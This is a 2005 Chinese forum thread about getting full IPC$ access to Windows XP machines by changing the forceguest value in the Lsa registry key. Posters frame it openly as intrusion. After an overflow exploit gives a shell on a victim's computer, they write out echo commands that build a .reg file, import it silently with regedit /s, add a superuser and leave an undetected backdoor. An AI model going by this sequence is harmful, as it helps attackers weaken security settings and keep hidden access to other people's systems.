xp下ipc$连接的问题

XP系统对于外来用户即使是admin也当成guest，所以我们就算得到对方的admin帐号密码也无法使用ipc$去连接对方，尽管提示命令成功到达。但是权限依旧是guest，因此无法使用一些基于ipc$连接的软件无法使用，而上传文件也是不可能的。在05.1期X档案中我看到一篇关于这方面的文章，转载过来，有兴趣的可以看看。
在XP的本地安全策略中有一项"网络访问：本地帐户的共享和安全模式仅来宾-本地用户以来宾身份验证"，看一下属性，还有一项"经典-本地用户以自己的身份验证。将他改成"经典…"后就可通过ipc$来连接xp。
通过修改注册表可以修改组策略，"仅来宾-本地用户以来宾身份验证"改成"经典…"注册表中[HKEY_LOCAL_MACHINE\SYSYTEM\ControlSet001\Conrtol\Lsa] 下的“forceguest"的值由"1"变成了"0"
呵呵… 到这而知道如何利用这个了吧？

嘿嘿  可能千说的操作方法有点不具体！ ^_^
我顺便补充一句， 可能有些人连组策略都不会打开，那么我提供一个打开方法 ^_^
打开“开始”菜单\“运行”\输入“gpedit.msc”\“计算机配置”\“Windows设置”\“本地策略”\“安全策略”\....（按照千的方法找到“网络访问”这一列）

嘿嘿…… 来一块研究……

开gpedit.msc是前提是什么…………

其实这个利用主要是通过溢出成功后在对方DOS下修改注册表 然后留一个不被查杀的后门……… 我们肯定不可能跑到要黑的电脑上去给人家改注册表吧 嘿嘿

下面引用由skyxhc在 2005/01/22 09:09am 发表的内容：
开gpedit.msc是前提是什么…………

前提是要有对方的cmd权限，这样在运行里面输入gpedit.msc就可以进入windows的组策略了
这样就可以实现千说的方法了！

是，，这个不错`~
嘿嘿`~

溢出成功后在对方命令行下修改注册表
c:\windows\system32>cd..
c:\windows>
c:\windows>echo windows registry
editor version 5.00>ipc1.reg
echo windows registry editor ver-
sion 5.00>ipc1.reg
c:\windows>echo [hkey_local_ma
chne\system\controlset001\control\lsa]>>
ipc1.reg
  echo [hkey_local_ma
chne\system\controlset001\control\lsa]>>
ipc1.reg
c:\windows>echo "forceguest"=dword:00000000>>ipc1.reg
  echo "forceguest"=dword:00000000>>ipc1.reg
c:\windows>regedit.exe /s ipc1.reg
regedit.exe /s ipc1.reg
你们试一下看看是不是可以成功
上面是建立一个reg文件ipc1.reg,然后用regedit.exe /s ipc1.reg导入到注册表中。
然后在建立一个超级用户。

下面引用由风幻残林在 2005/01/22 05:19pm 发表的内容：
前提是要有对方的cmd权限，这样在运行里面输入gpedit.msc就可以进入windows的组策略了
这样就可以实现千说的方法了！

要能看到gpedit.msc的内容必须在图形界面下,但我都能看到他的gpedit.msc了我还要ipc$来做什么?
楼上的用注册表方法加个超级用户,前提是这个cmd要有能加用户的权限对不?

恩 我介绍的是在DOS下 如何通过修改注册表来达到开IPC$的，你先溢出得到对方CMD权限后开这个建立不被查杀的后门